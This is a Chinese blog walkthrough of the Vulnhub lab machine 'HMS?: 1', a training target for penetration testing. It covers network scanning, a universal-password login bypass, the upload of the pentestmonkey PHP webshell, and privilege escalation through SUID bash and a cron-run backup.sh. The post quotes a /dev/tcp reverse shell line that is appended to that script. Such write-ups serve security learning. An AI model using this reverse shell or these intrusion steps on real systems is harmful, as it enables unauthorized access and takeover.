Vulnhub 靶场 HMS?: 1

Vulnhub 靶场 HMS?: 1

前期准备:
靶机地址:https://www.vulnhub.com/entry/hms-1,728/
攻击机ip:192.168.147.190
靶机ip:192.168.147.212

一、信息收集

1、arp-scan -l 扫描全网段存活服务器。
image
2、nmap对目标机器进行扫描。
image
发现开启21、22、7080等端口。
3、21端口
image
4、7080端口
image
发现是个邮件表单。

二、漏洞利用

1、尝试利用万能密码登陆,避免前端页面验证,F12将type类型删除。
image
万能密码成功登陆系统
image
image
查看源码发现上传地址。
image
还在源码发现setting.php,右下角可对文件进行上传。
image

image
从 pentenstmonkey 复制了一个 webshell 上传并监听,上传成功后访问之前发现的文件上传目录:
image
靶机设置监听
image
python写入交互式shell。

三、提权

查看一下有几个用户。
image
发现有eren、nivek两个用户,查看有哪些可执行文件

find / -perm -4000 -type f 2>/dev/null

image
发现/usr/bin/bash可执行,我们可以切换用户。
image
成功切换到eren用户,查看可执行文件发现查看不了,查看是否有定时文件。
image
发现backup.sh每5分钟运行一次。
image
利用定时任务来反弹shell,提取权限,像backup.sh写入shell。

echo "bash -i >& /dev/tcp/192.168.147.190/1235 0>&1" >> backup.sh

image
靶机设置监听,等待一会成功获取shell。
查看权限sudo -l,发现可以用tar提权。
image

posted on   水果味儿  阅读(543)  评论(0编辑  收藏  举报

相关博文:
阅读排行:
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· Docker 太简单,K8s 太复杂?w7panel 让容器管理更轻松!
< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5

统计

点击右上角即可分享
微信分享提示